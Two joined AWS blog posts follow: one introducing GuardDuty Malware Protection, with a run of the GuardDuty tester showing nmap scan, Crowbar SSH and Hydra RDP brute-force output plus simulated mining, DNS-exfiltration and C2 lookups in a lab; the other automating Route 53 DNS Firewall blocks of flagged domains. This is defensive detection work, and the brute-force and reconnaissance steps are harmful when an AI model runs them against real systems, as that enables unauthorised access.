When potential malware is identified, actionable security findings are generated with information such as the threat and file name, the file path, the EC2 instance ID, resource tags and, in the case of containers, the container ID and the container image used. GuardDuty supports container workloads running on EC2, including customer-managed Kubernetes clusters or individual Docker containers. If the container is managed by Amazon Elastic Kubernetes Service (EKS) or Amazon Elastic Container Service (Amazon ECS), the findings also include the cluster name and the task or pod ID so application and security teams can quickly find the affected container resources.

As with all other GuardDuty findings, malware detections are sent to the GuardDuty console, pushed through Amazon EventBridge, routed to AWS Security Hub, and made available in Amazon Detective for incident investigation.

How GuardDuty Malware Protection Works
When you enable malware protection, you set up an AWS Identity and Access Management (IAM) service-linked role that grants GuardDuty permissions to perform malware scans. When a malware scan is initiated for an EC2 instance, GuardDuty Malware Protection uses those permissions to take a snapshot of the attached Amazon Elastic Block Store (EBS) volumes that are less than 1 TB in size and then restore the EBS volumes in an AWS service account in the same AWS Region to scan them for malware. You can use tagging to include or exclude EC2 instances from those permissions and from scanning. In this way, you don’t need to deploy security software or agents to monitor for malware, and scanning the volumes doesn’t impact running workloads. The EBS volumes in the service account and the snapshots in your account are deleted after the scan. Optionally, you can preserve the snapshots when malware is detected.

The service-linked role grants GuardDuty access to AWS Key Management Service (AWS KMS) keys used to encrypt EBS volumes. If the EBS volumes attached to a potentially compromised EC2 instance are encrypted with a customer-managed key, GuardDuty Malware Protection uses the same key to encrypt the replica EBS volumes as well. If the volumes are not encrypted, GuardDuty uses its own key to encrypt the replica EBS volumes and ensure privacy. Volumes encrypted with EBS-managed keys are not supported.

Security in the cloud is a shared responsibility between you and AWS. As a guardrail, the service-linked role used by GuardDuty Malware Protection cannot perform any operation on your resources (such as EBS snapshots and volumes, EC2 instances, and KMS keys) if they have the GuardDutyExcluded tag. Once you mark your snapshots with GuardDutyExcluded set to true, the GuardDuty service won’t be able to access these snapshots. The GuardDutyExcluded tag supersedes any inclusion tag. Permissions also restrict how GuardDuty can modify your snapshots so that they cannot be made public while shared with the GuardDuty service account.
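
For example, the following Boto3 sketch applies the exclusion tag to a snapshot (the snapshot ID is a placeholder):

import boto3

ec2 = boto3.client("ec2")

# Resources carrying GuardDutyExcluded=true are off limits to the
# GuardDuty Malware Protection service-linked role.
ec2.create_tags(
    Resources=["snap-0123456789abcdef0"],  # placeholder snapshot ID
    Tags=[{"Key": "GuardDutyExcluded", "Value": "true"}],
)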

The EBS volumes created by GuardDuty are always encrypted. GuardDuty can use KMS keys only on EBS snapshots that have a GuardDuty scan ID tag. The scan ID tag is added by GuardDuty when snapshots are created after an EC2 finding. The KMS keys that are shared with the GuardDuty service account can be used only from the Amazon EBS service context. Once the scan completes successfully, the KMS key grant is revoked and the volume replica in the GuardDuty service account is deleted, making sure that the GuardDuty service cannot access your data after completing the scan operation.

Enabling Malware Protection for an AWS Account
If you’re not using GuardDuty yet, Malware Protection is enabled by default when you activate GuardDuty for your account. Because I am already using GuardDuty, I need to enable Malware Protection from the console. If you’re using AWS Organizations, your delegated administrator accounts can enable this for existing member accounts and configure if new AWS accounts in the organization should be automatically enrolled.
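
If you manage detectors programmatically instead, the same setting can be applied with Boto3. This sketch assumes the DataSources request shape available at launch and a single detector in the Region:

import boto3

guardduty = boto3.client("guardduty")

detector_id = guardduty.list_detectors()["DetectorIds"][0]

# Enable EBS malware scanning for findings on this detector.
guardduty.update_detector(
    DetectorId=detector_id,
    DataSources={
        "MalwareProtection": {
            "ScanEc2InstanceWithFindings": {"EbsVolumes": True}
        }
    },
)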

In the GuardDuty console, I choose Malware Protection under Settings in the navigation pane. There, I choose Enable and then Enable Malware Protection.

Console screenshot.

Snapshots are automatically deleted after they are scanned. In General settings, I have the option to retain in my AWS account the snapshots where malware is detected and have them available for further analysis.

Console screenshot.

In Scan options, I can configure a list of inclusion tags, so that only EC2 instances with those tags are scanned, or exclusion tags, so that EC2 instances with tags in the list are skipped.

Console screenshot.

Testing Malware Protection GuardDuty Findings
To generate several Amazon GuardDuty findings, including the new Malware Protection findings, I clone the Amazon GuardDuty Tester repo:

$ git clone https://github.com/awslabs/amazon-guardduty-tester

First, I create an AWS CloudFormation stack using the guardduty-tester.template file. When the stack is ready, I follow the instructions to configure my SSH client to log in to the tester instance through the bastion host. Then, I connect to the tester instance:

$ ssh tester

From the tester instance, I start the guardduty_tester.sh script to generate the findings:

$ ./guardduty_tester.sh 

***********************************************************************
* Test #1 - Internal port scanning                                    *
* This simulates internal reconaissance by an internal actor or an   *
* external actor after an initial compromise. This is considered a    *
* low priority finding for GuardDuty because its not a clear indicator*
* of malicious intent on its own.                                     *
***********************************************************************


Starting Nmap 6.40 ( http://nmap.org ) at 2022-05-19 09:36 UTC
Nmap scan report for ip-172-16-0-20.us-west-2.compute.internal (172.16.0.20)
Host is up (0.00032s latency).
Not shown: 997 filtered ports
PORT     STATE  SERVICE
22/tcp   open   ssh
80/tcp   closed http
5050/tcp closed mmcc
MAC Address: 06:25:CB:F4:E0:51 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 4.96 seconds

-----------------------------------------------------------------------

***********************************************************************
* Test #2 - SSH Brute Force with Compromised Keys                     *
* This simulates an SSH brute force attack on an SSH port that we    *
* can access from this instance. It uses (phony) compromised keys in  *
* many subsequent attempts to see if one works. This is a common      *
* techique where the bad actors will harvest keys from the web in     *
* places like source code repositories where people accidentally leave*
* keys and credentials (This attempt will not actually succeed in     *
* obtaining access to the target linux instance in this subnet)       *
***********************************************************************

2022-05-19 09:36:29 START
2022-05-19 09:36:29 Crowbar v0.4.3-dev
2022-05-19 09:36:29 Trying 172.16.0.20:22
2022-05-19 09:36:33 STOP
2022-05-19 09:36:33 No results found...
2022-05-19 09:36:33 START
2022-05-19 09:36:33 Crowbar v0.4.3-dev
2022-05-19 09:36:33 Trying 172.16.0.20:22
2022-05-19 09:36:37 STOP
2022-05-19 09:36:37 No results found...
2022-05-19 09:36:37 START
2022-05-19 09:36:37 Crowbar v0.4.3-dev
2022-05-19 09:36:37 Trying 172.16.0.20:22
2022-05-19 09:36:41 STOP
2022-05-19 09:36:41 No results found...
2022-05-19 09:36:41 START
2022-05-19 09:36:41 Crowbar v0.4.3-dev
2022-05-19 09:36:41 Trying 172.16.0.20:22
2022-05-19 09:36:45 STOP
2022-05-19 09:36:45 No results found...
2022-05-19 09:36:45 START
2022-05-19 09:36:45 Crowbar v0.4.3-dev
2022-05-19 09:36:45 Trying 172.16.0.20:22
2022-05-19 09:36:48 STOP
2022-05-19 09:36:48 No results found...
2022-05-19 09:36:49 START
2022-05-19 09:36:49 Crowbar v0.4.3-dev
2022-05-19 09:36:49 Trying 172.16.0.20:22
2022-05-19 09:36:52 STOP
2022-05-19 09:36:52 No results found...
2022-05-19 09:36:52 START
2022-05-19 09:36:52 Crowbar v0.4.3-dev
2022-05-19 09:36:52 Trying 172.16.0.20:22
2022-05-19 09:36:56 STOP
2022-05-19 09:36:56 No results found...
2022-05-19 09:36:56 START
2022-05-19 09:36:56 Crowbar v0.4.3-dev
2022-05-19 09:36:56 Trying 172.16.0.20:22
2022-05-19 09:37:00 STOP
2022-05-19 09:37:00 No results found...
2022-05-19 09:37:00 START
2022-05-19 09:37:00 Crowbar v0.4.3-dev
2022-05-19 09:37:00 Trying 172.16.0.20:22
2022-05-19 09:37:04 STOP
2022-05-19 09:37:04 No results found...
2022-05-19 09:37:04 START
2022-05-19 09:37:04 Crowbar v0.4.3-dev
2022-05-19 09:37:04 Trying 172.16.0.20:22
2022-05-19 09:37:08 STOP
2022-05-19 09:37:08 No results found...
2022-05-19 09:37:08 START
2022-05-19 09:37:08 Crowbar v0.4.3-dev
2022-05-19 09:37:08 Trying 172.16.0.20:22
2022-05-19 09:37:12 STOP
2022-05-19 09:37:12 No results found...
2022-05-19 09:37:12 START
2022-05-19 09:37:12 Crowbar v0.4.3-dev
2022-05-19 09:37:12 Trying 172.16.0.20:22
2022-05-19 09:37:16 STOP
2022-05-19 09:37:16 No results found...
2022-05-19 09:37:16 START
2022-05-19 09:37:16 Crowbar v0.4.3-dev
2022-05-19 09:37:16 Trying 172.16.0.20:22
2022-05-19 09:37:20 STOP
2022-05-19 09:37:20 No results found...
2022-05-19 09:37:20 START
2022-05-19 09:37:20 Crowbar v0.4.3-dev
2022-05-19 09:37:20 Trying 172.16.0.20:22
2022-05-19 09:37:23 STOP
2022-05-19 09:37:23 No results found...
2022-05-19 09:37:23 START
2022-05-19 09:37:23 Crowbar v0.4.3-dev
2022-05-19 09:37:23 Trying 172.16.0.20:22
2022-05-19 09:37:27 STOP
2022-05-19 09:37:27 No results found...
2022-05-19 09:37:27 START
2022-05-19 09:37:27 Crowbar v0.4.3-dev
2022-05-19 09:37:27 Trying 172.16.0.20:22
2022-05-19 09:37:31 STOP
2022-05-19 09:37:31 No results found...
2022-05-19 09:37:31 START
2022-05-19 09:37:31 Crowbar v0.4.3-dev
2022-05-19 09:37:31 Trying 172.16.0.20:22
2022-05-19 09:37:34 STOP
2022-05-19 09:37:34 No results found...
2022-05-19 09:37:35 START
2022-05-19 09:37:35 Crowbar v0.4.3-dev
2022-05-19 09:37:35 Trying 172.16.0.20:22
2022-05-19 09:37:38 STOP
2022-05-19 09:37:38 No results found...
2022-05-19 09:37:38 START
2022-05-19 09:37:38 Crowbar v0.4.3-dev
2022-05-19 09:37:38 Trying 172.16.0.20:22
2022-05-19 09:37:42 STOP
2022-05-19 09:37:42 No results found...
2022-05-19 09:37:42 START
2022-05-19 09:37:42 Crowbar v0.4.3-dev
2022-05-19 09:37:42 Trying 172.16.0.20:22
2022-05-19 09:37:46 STOP
2022-05-19 09:37:46 No results found...

-----------------------------------------------------------------------

***********************************************************************
* Test #3 - RDP Brute Force with Password List                        *
* This simulates an RDP brute force attack on the internal RDP port  *
* of the windows server that we installed in the environment.  It uses*
* a list of common passwords that can be found on the web. This test  *
* will trigger a detection, but will fail to get into the target      *
* windows instance.                                                   *
***********************************************************************

Sending 250 password attempts at the windows server...
Hydra v9.4-dev (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-05-19 09:37:46
[WARNING] rdp servers often don't like many connections, use -t 1 or -t 4 to reduce the number of parallel connections and -W 1 or -W 3 to wait between connection to allow the server to recover
[INFO] Reduced number of tasks to 4 (rdp does not like many parallel connections)
[WARNING] the rdp module is experimental. Please test, report - and if possible, fix.
[DATA] max 4 tasks per 1 server, overall 4 tasks, 1792 login tries (l:7/p:256), ~448 tries per task
[DATA] attacking rdp://172.16.0.24:3389/
[STATUS] 1099.00 tries/min, 1099 tries in 00:01h, 693 to do in 00:01h, 4 active
1 of 1 target completed, 0 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-05-19 09:39:23

-----------------------------------------------------------------------

***********************************************************************
* Test #4 - CryptoCurrency Mining Activity                            *
* This simulates interaction with a cryptocurrency mining pool which *
* can be an indication of an instance compromise. In this case, we are*
* only interacting with the URL of the pool, but not downloading      *
* any files. This will trigger a threat intel based detection.        *
***********************************************************************

Calling bitcoin wallets to download mining toolkits

-----------------------------------------------------------------------

***********************************************************************
* Test #5 - DNS Exfiltration                                          *
* A common exfiltration technique is to tunnel data out over DNS      *
* to a fake domain.  Its an effective technique because most hosts    *
* have outbound DNS ports open.  This test wont exfiltrate any data,  *
* but it will generate enough unusual DNS activity to trigger the     *
* detection.                                                          *
***********************************************************************

Calling large numbers of large domains to simulate tunneling via DNS

***********************************************************************
* Test #6 - Fake domain to prove that GuardDuty is working            *
* This is a permanent fake domain that customers can use to prove that*
* GuardDuty is working.  Calling this domain will always generate the *
* Backdoor:EC2/C&CActivity.B!DNS finding type                         *
***********************************************************************

Calling a well known fake domain that is used to generate a known finding

; <<>> DiG 9.11.4-P2-RedHat-9.11.4-26.P2.amzn2.5.2 <<>> GuardDutyC2ActivityB.com any
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 11495
;; flags: qr rd ra; QUERY: 1, ANSWER: 8, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;GuardDutyC2ActivityB.com.	IN	ANY

;; ANSWER SECTION:
GuardDutyC2ActivityB.com. 6943	IN	SOA	ns1.markmonitor.com. hostmaster.markmonitor.com. 2018091906 86400 3600 2592000 172800
GuardDutyC2ActivityB.com. 6943	IN	NS	ns3.markmonitor.com.
GuardDutyC2ActivityB.com. 6943	IN	NS	ns5.markmonitor.com.
GuardDutyC2ActivityB.com. 6943	IN	NS	ns7.markmonitor.com.
GuardDutyC2ActivityB.com. 6943	IN	NS	ns2.markmonitor.com.
GuardDutyC2ActivityB.com. 6943	IN	NS	ns4.markmonitor.com.
GuardDutyC2ActivityB.com. 6943	IN	NS	ns6.markmonitor.com.
GuardDutyC2ActivityB.com. 6943	IN	NS	ns1.markmonitor.com.

;; Query time: 27 msec
;; SERVER: 172.16.0.2#53(172.16.0.2)
;; WHEN: Thu May 19 09:39:23 UTC 2022
;; MSG SIZE  rcvd: 238


*****************************************************************************************************
Expected GuardDuty Findings

Test 1: Internal Port Scanning
Expected Finding: EC2 Instance  i-011e73af27562827b  is performing outbound port scans against remote host. 172.16.0.20
Finding Type: Recon:EC2/Portscan

Test 2: SSH Brute Force with Compromised Keys
Expecting two findings - one for the outbound and one for the inbound detection
Outbound:  i-011e73af27562827b  is performing SSH brute force attacks against  172.16.0.20
Inbound:  172.16.0.25  is performing SSH brute force attacks against  i-0bada13e0aa12d383
Finding Type: UnauthorizedAccess:EC2/SSHBruteForce

Test 3: RDP Brute Force with Password List
Expecting two findings - one for the outbound and one for the inbound detection
Outbound:  i-011e73af27562827b  is performing RDP brute force attacks against  172.16.0.24
Inbound:  172.16.0.25  is performing RDP brute force attacks against  i-0191573dec3b66924
Finding Type : UnauthorizedAccess:EC2/RDPBruteForce

Test 4: Cryptocurrency Activity
Expected Finding: EC2 Instance  i-011e73af27562827b  is querying a domain name that is associated with bitcoin activity
Finding Type : CryptoCurrency:EC2/BitcoinTool.B!DNS

Test 5: DNS Exfiltration
Expected Finding: EC2 instance  i-011e73af27562827b  is attempting to query domain names that resemble exfiltrated data
Finding Type : Trojan:EC2/DNSDataExfiltration

Test 6: C&C Activity
Expected Finding: EC2 instance  i-011e73af27562827b  is querying a domain name associated with a known Command & Control server. 
Finding Type : Backdoor:EC2/C&CActivity.B!DNS

After a few minutes, the findings appear in the GuardDuty console. At the top, I see the malicious files found by the new Malware Protection capability. One of the findings is related to an EC2 instance, the other to an ECS cluster.

Console screenshot.

First, I select the finding related to the EC2 instance. In the panel, I see the information on the instance and the malicious file, such as the file name and path. In the Malware scan details section, the Trigger finding ID points to the original GuardDuty finding that triggered the malware scan. In my case, the original finding was that this EC2 instance was performing RDP brute force attacks against another EC2 instance.

Console screenshot.

Here, I choose Investigate with Detective and, directly from the GuardDuty console, I go to the Detective console to visualize AWS CloudTrail and Amazon Virtual Private Cloud (Amazon VPC) flow data for the EC2 instance, the AWS account, and the IP address affected by the finding. Using Detective, I can analyze, investigate, and identify the root cause of suspicious activities found by GuardDuty.

Console screenshot.

When I select the finding related to the ECS cluster, I have more information on the resource affected, such as the details of the ECS cluster, the task, the containers, and the container images.

Console screenshot.

Using the GuardDuty tester scripts makes it easier to test the overall integration of GuardDuty with other security frameworks you use so that you can be ready when a real threat is detected.

Comparing GuardDuty Malware Protection with Amazon Inspector
At this point, you might ask yourself how GuardDuty Malware Protection relates to Amazon Inspector, a service that scans AWS workloads for software vulnerabilities and unintended network exposure. The two services complement each other and offer different layers of protection:

  • Amazon Inspector offers proactive protection by identifying and remediating known software and application vulnerabilities that serve as an entry point for attackers to compromise resources and install malware.
  • GuardDuty Malware Protection detects malware that is found to be present on actively running workloads. At that point, the system has already been compromised, but GuardDuty can limit the time of an infection and take action before a system compromise results in a business-impacting event.

Availability and Pricing
Amazon GuardDuty Malware Protection is available today in all AWS Regions where GuardDuty is available, excluding the AWS China (Beijing), AWS China (Ningxia), AWS GovCloud (US-East), and AWS GovCloud (US-West) Regions.

At launch, GuardDuty Malware Protection is integrated with these partner offerings:

With GuardDuty, you don’t need to deploy security software or agents to monitor for malware. You only pay for the amount of GB scanned in the file systems (not for the size of the EBS volumes) and for the EBS snapshots during the time they are kept in your account. All EBS snapshots created by GuardDuty are automatically deleted after they are scanned unless you enable snapshot retention when malware is found. For more information, see GuardDuty pricing and EBS pricing. Note that GuardDuty only scans EBS volumes less than 1 TB in size. To help you control costs and avoid repeating alarms, the same volume is not scanned more often than once every 24 hours.

Detect malicious activity and protect your applications from malware with Amazon GuardDuty.

Danilo

Automatically block suspicious DNS activity with Amazon GuardDuty and Route 53 Resolver DNS Firewall

Post Syndicated from Akshay Karanth original https://aws.amazon.com/blogs/security/automatically-block-suspicious-dns-activity-with-amazon-guardduty-and-route-53-resolver-dns-firewall/

In this blog post, we’ll show you how to use Amazon Route 53 Resolver DNS Firewall to automatically respond to suspicious DNS queries that are detected by Amazon GuardDuty within your Amazon Web Services (AWS) environment.

The Security Pillar of the AWS Well-Architected Framework includes incident response, stating that your organization should implement mechanisms to automatically respond to and mitigate the potential impact of security issues. Automating incident response helps you scale your capabilities, rapidly reduce the scope of compromised resources, and reduce repetitive work by security teams.

Use cases for Route 53 Resolver DNS Firewall

Route 53 Resolver DNS Firewall is a managed firewall that you can use to block DNS queries that are made for known malicious domains and to allow queries for trusted domains. It provides more granular control over the DNS querying behavior of resources within your VPCs.

Let’s discuss two use cases for Route 53 Resolver DNS Firewall:

Use of allow lists – If you have stricter security requirements around network security controls and want to deny all outbound DNS queries for domains that don’t match those on your lists of approved domains (known as allow lists), you can create such rules. This is called a walled garden approach to DNS security. These allow lists only include the domains for which resources within your Amazon Virtual Private Cloud (Amazon VPC) are allowed to make DNS queries through Amazon-provided DNS. This helps to ensure that the DNS queries containing the domains that your organization doesn’t trust are blocked.

Use of deny lists – If your organization prefers to allow all outbound DNS lookups within your accounts by default and only requires the ability to block DNS queries for known malicious domains, you can use DNS Firewall to create deny lists, which include all the malicious domain names that your organization is aware of. DNS Firewall also provides AWS Managed Rules, giving you the ability to configure protections against known DNS threats like command-and-control (C&C) bots. You can also add block lists from open-source third-party threat intelligence sources; a sketch of creating such a list programmatically follows the list of considerations below.

A few important points about the use of allow and deny lists:

  1. Broader use of allow lists is more effective at blocking a greater number of malicious DNS queries than a short deny list. For example, if your workloads only need access to .com domains, then allowing only .com will block many malicious domains that might be specific to certain countries. View a list of country code top-level domains (ccTLDs).
  2. If you use allow lists, you need to make sure that you keep up with the domains that your applications need to communicate with. Likewise, if you use deny lists, you need to keep up with updates to the lists.
  3. Allow lists and deny lists are not mutually exclusive models and can be used together. For example, let’s say that you have an allow list that only allows .com domains (with the intention of blocking several ccTLDs by default). You can also use the built-in AWS Managed Rules deny list to block known malicious .com domains for an additional layer of security.
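
As referenced above, here is a Boto3 sketch that creates a deny list and adds a domain to it; the list name and domain are examples:

import uuid

import boto3

resolver = boto3.client("route53resolver")

# Create an empty domain list to use as a deny list.
domain_list = resolver.create_firewall_domain_list(
    CreatorRequestId=str(uuid.uuid4()),
    Name="example-deny-list",
)["FirewallDomainList"]

# Add a known-bad domain to the list.
resolver.update_firewall_domains(
    FirewallDomainListId=domain_list["Id"],
    Operation="ADD",
    Domains=["guarddutyc2activityb.com"],
)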

Solution overview

Refer to the DNS Firewall documentation to familiarize yourself with its constructs and understand how it works. The automation example we provide in this blog post is focused on providing blocks or alerts for DNS queries with suspicious domain names. For example, consider the scenario where an Amazon Elastic Compute Cloud (Amazon EC2) instance queries a domain name that is associated with a known command-and-control server. As shown in Figure 1, when GuardDuty detects communication with the malicious domain, it initiates a series of steps. First, AWS Step Functions orchestrates the remediation response through a defined workflow, then DNS Firewall adds the suspicious domain to deny list or alert list, and finally GuardDuty notifies the security operators of the attempted communication.

Figure 1: High-level solution overview

In this solution, the detection of threats by GuardDuty triggers the automated remediation procedure documented in this post. GuardDuty informs you of the status of your AWS environment by producing security findings. Each GuardDuty finding has an assigned severity level and value that reflects the potential risk that the finding could have to your network as determined by our security engineers. The value of the severity can fall anywhere within the 0.1 to 8.9 range, with higher values indicating greater security risk. To help you determine a response to a potential security issue that is highlighted by a finding, GuardDuty breaks down this range into High, Medium, and Low severity levels. We have seen that many of the DNS-based GuardDuty findings fall into the category of High severity, and many times these findings are strongly indicative of potential compromise (for example, pre-ransomware activity).

In this blog post, we specifically focus on the following types of GuardDuty findings:

  • Backdoor:EC2/C&CActivity.B!DNS
  • Impact:EC2/MaliciousDomainRequest.Reputation
  • Trojan:EC2/DNSDataExfiltration

We’ve configured DNS Firewall to block only events with High severity by sending only those domains to the deny list. DNS Firewall sends the rest of the domains to an alert list.
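
In code, that routing decision reduces to a severity threshold. The sketch below uses the GuardDuty High range (7.0 to 8.9) and the default domain list names from the CloudFormation template described later in this post:

def choose_domain_list(severity):
    # GuardDuty labels severity values from 7.0 to 8.9 as High.
    if severity >= 7.0:
        return "DemoBlockedDomainListAutoUpdated"  # deny list
    return "DemoAlertDomainListAutoUpdated"        # alert list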

This solution uses Step Functions and AWS Lambda so that incident response steps run in the correct order. Step Functions also provides retry and error-handling logic. Lambda functions interact with networking services to block traffic, and with databases to store data about blocked domain lists and AWS Security Hub finding Amazon Resource Names (ARNs).

How it works

Figure 2 shows the automated remediation workflow in detail.
 

Figure 2: Detailed workflow diagram

The solution is implemented as follows:

  1. GuardDuty detects communication attempts that include a suspicious domain. GuardDuty generates a finding, in JSON format, that includes details such as the EC2 instance ID involved (if applicable), account information, type of finding, domain, and other details. Following is a sample finding (some fields removed for brevity).
    {
      "schemaVersion": "2.0",
      "accountId": "123456789012",
      "id": "1234567890abcdef0",
      "type": "Backdoor:EC2/C&CActivity.B!DNS",
      "service": {
        "serviceName": "guardduty",
        "action": {
          "actionType": "DNS_REQUEST",
          "dnsRequestAction": {
            "domain": "guarddutyc2activityb.com",
            "protocol": "UDP",
            "blocked": false
          }
        }
      }
    }
    

  2. Security Hub ingests the finding generated by GuardDuty and consolidates it with findings from other AWS security services. Security Hub also publishes the contents of the finding to the default bus in Amazon EventBridge. Following is a snippet from a sample event published to EventBridge.
    {
      "id": "12345abc-ca56-771b-cd1b-710550598e37",
      "detail-type": "Security Hub Findings - Imported",
      "source": "aws.securityhub",
      "account": "123456789012",
      "time": "2021-01-05T01:20:33Z",
      "region": "us-east-1",
      "detail": {
        "findings": [
          {
            "ProductArn": "arn:aws:securityhub:us-east-1::product/aws/guardduty",
            "Types": ["Software and Configuration Checks/Backdoor:EC2.C&CActivity.B!DNS"],
            "LastObservedAt": "2021-01-05T01:15:01.549Z",
            "ProductFields": {
              "aws/guardduty/service/action/dnsRequestAction/blocked": "false",
              "aws/guardduty/service/action/dnsRequestAction/domain": "guarddutyc2activityb.com"
            }
          }
        ]
      }
    }
    

  3. EventBridge has a rule with an event pattern that matches GuardDuty events that contain the malicious domain name. When an event matching the pattern is published on the default bus, EventBridge routes that event to the designated target, in this case a Step Functions state machine. Following is a snippet of AWS CloudFormation code that defines the EventBridge rule.
    # EventBridge Event Rule - For Security Hub event published to EventBridge:
      SecurityHubtoFirewallStateMachineEvent:
        Type: "AWS::Events::Rule"
        Properties:
          Description: "Security Hub - GuardDuty findings with DNS Domain"
          EventPattern:
            source:
            - aws.securityhub
            detail:
              findings:
                ProductFields:
                  aws/guardduty/service/action/dnsRequestAction/blocked:
                    - "exists": true
          State: "ENABLED"
          Targets:
            -
              Arn: !GetAtt SecurityHubtoDnsFirewallStateMachine.Arn
              RoleArn: !GetAtt SecurityHubtoFirewallStateMachineEventRole.Arn
              Id: "GuardDutyEvent-StepFunctions-Trigger"
    

  4. The Step Functions state machine ingests the details of the Security Hub finding published in EventBridge and orchestrates the remediation response through a defined workflow. Figure 3 shows the state machine workflow.
     
    Figure 3: AWS Step Functions state machine workflow

  5. The first two steps in the state machine, getDomainFromDynamo and isDomainInDynamo, invoke the Lambda function CheckDomainInDynamoLambdaFunction that checks whether the flagged domain is already in the Amazon DynamoDB table (a sketch of this check appears after this list). If the domain already exists in DynamoDB, then the workflow continues to check whether the domain is also in the domain list and adds it accordingly. If the domain is not in DynamoDB, then the workflow considers it a new addition and adds the domain to both domain lists, as well as the DynamoDB table.
  6. The next three steps in the state machine—getDomainFromDomainList, isDomainInDomainList, and addDomainToDnsFirewallDomainList—invoke a second Lambda function that checks and updates the DNS Firewall domain lists with the domain name. Figure 4 shows an example of the DNS Firewall rules and associated domain list.
     
    Figure 4: Sample rules in a DNS Firewall rule group

    Figure 5 shows the domain lists.
     

    Figure 5: Domain lists

    The next step in the state machine, updateDynamoDB, invokes a third Lambda function that updates the DynamoDB table with the domain that was just added to the domain list. Figure 6 shows an example domain entry that gets stored inside the DynamoDB table.
     

    Figure 6: DynamoDB table entry

  7. The notifySuccess step of the state machine uses an Amazon Simple Notification Service (Amazon SNS) topic to send out a message that the automatic block or alert happened.
  8. If there was a failure in any of the previous steps, then the state machine runs the notifyFailure step. The state machine publishes a message on the SNS topic that the automated remediation workflow has failed to complete, and that manual intervention might be required.
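
As noted in step 5, the DynamoDB check at the heart of the workflow is a simple lookup. The following sketch shows the idea; the table and key attribute names are placeholders for what the template actually creates:

import boto3

dynamodb = boto3.client("dynamodb")

def domain_already_tracked(domain):
    # Returns True when the flagged domain is already in the table.
    response = dynamodb.get_item(
        TableName="DomainListTable",        # placeholder table name
        Key={"domainName": {"S": domain}},  # placeholder key attribute
    )
    return "Item" in response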

Solution deployment and testing

To set up this solution, you’ll do the following steps:

  1. Verify prerequisites in your AWS account.
  2. Deploy the CloudFormation template.
  3. Create a test Security Hub event.
  4. Confirm the entry in the DNS Firewall rule group domain list.
  5. Confirm the SNS notification.
  6. Apply the rule group to your VPC by using DNS Firewall.

Step 1: Verify prerequisites in your AWS account

The sample solution we provide in this blog post requires that you activate both GuardDuty and Security Hub in your AWS account. If either of these services is not activated in your account, do the following:

Step 2: Deploy the CloudFormation template

For this next step, make sure that you deploy the template within the AWS account and the AWS Region where you want to monitor GuardDuty findings and block suspicious DNS activity. Depending on your architecture, you can deploy the solution one time centrally in a security account or deploy it repeatedly across multiple accounts.

To deploy the template

  1. Choose the Launch Stack button to launch a CloudFormation stack in your account:

    Note: The stack will launch in the N. Virginia (us-east-1) Region. It takes approximately 15 minutes for the CloudFormation stack to complete. To deploy this solution into other AWS Regions, download the solution’s CloudFormation template and deploy it to the selected Region. Route 53 Resolver DNS Firewall isn’t currently available in all Regions. For more information about where it’s available, see the list of service endpoints.

  2. In the AWS CloudFormation console, select the Select Template form, and then choose Next.
  3. On the Specify Details page, provide the following input parameters. You can modify the default values to customize the solution for your environment.
    • AdminEmail – The email address to receive notifications. This must be a valid email address. There is no default value.
    • DnsFireWallAlertDomainListName – The name of the domain list for DNS Firewall that consists of domains that will be only alerted and not blocked. The default value is DemoAlertDomainListAutoUpdated.
    • DnsFireWallBlockDomainListName – The name of the domain list for DNS Firewall that consists of domains that will be blocked. The default value is DemoBlockedDomainListAutoUpdated.
    • DnsFirewallBlockAction – You can select NODATA or NXDOMAIN. NODATA implies that there is no response available if a DNS query from the VPC matches a domain in the block domain list. NXDOMAIN implies that the response is an error message, which indicates that a domain doesn’t exist. The default value is NODATA.

    Figure 7 shows an example of the values entered in the Parameters screen.

    Figure 7: Sample CloudFormation stack parameters

  4. After you’ve entered values for all of the input parameters, choose Next.
  5. On the Options page, keep the defaults, and then choose Next.
  6. On the Review page, in the Capabilities section, select the check box next to I acknowledge that AWS CloudFormation might create IAM resources. Then choose Create. Figure 8 shows what the CloudFormation capabilities acknowledgement prompt looks like.
     
    Figure 8: AWS CloudFormation capabilities acknowledgement

While the stack is being created, check the email inbox that corresponds to the value that you gave for the AdminEmail address parameter. Look for an email message with the subject “AWS Notification – Subscription Confirmation.” Choose the link to confirm the subscription to the SNS topic.

After the Status field for the CloudFormation stack changes to CREATE_COMPLETE, as shown in Figure 9, the solution is implemented and is ready for testing.
 

Figure 9: CloudFormation stack completed deployment

Step 3: Create a test Security Hub event

After the CloudFormation stack has completed deployment, you can test the functionality by creating a test event in the same format as would be published by Security Hub.

To create a test run of the solution

  1. In the AWS Management Console, choose Services, choose CloudFormation, and then for Stack, choose the stack name that you provided in Step 2: Deploy the CloudFormation template.
  2. In the Resources tab for the stack, look for the SecurityHubDnsFirewallStateMachine entry. It should appear as shown in Figure 10.
     
    Figure 10: CloudFormation stack resources

  3. Choose the link in the entry. You’ll be redirected to the Step Functions console, with the state machine already open. Choose Start execution.
     
    Figure 11: AWS Step Functions state machine

  4. To facilitate testing, we’ve provided a test event file. On the Start execution page, in the Input section, paste the C&CActivity.B!DNS finding sample as shown in Figure 12.
     
    Figure 12: Sample input for the Step Functions state machine execution

  5. Note the domain name guarddutyc2activityb.com for the remote host identified in the GuardDuty finding in the test event on line 57 of the sample. The solution should block or alert traffic from that domain name in the following steps.
  6. Choose Start execution to begin the processing of the test event.
  7. You can now track the state machine processing of the test event. The processing should complete within a few seconds. You can select different steps in the visual Graph inspector to view input and output data. Figure 13 shows the input to the addDomainToDnsFirewallDomainList step that launches a Lambda function that interacts with DNS Firewall.
     
    Figure 13: Step Functions state machine step details

Step 4: Confirm the entry in the DNS Firewall rule group

Now that a test event was processed by the state machine, you can check whether the DNS Firewall rule group would block traffic to the domain name identified in the GuardDuty finding.

To validate entries in the DNS Firewall rule group

  1. In the AWS Management Console, choose Services, and then choose VPC. In the DNS Firewall section in the left navigation bar, choose DNS Firewall rule groups.
  2. Choose the demoDnsFirewallRuleGroup rule group created by the solution, and you’ll be able to see the rules as shown in Figure 14.
     
    Figure 14: Select the DNS Firewall rule

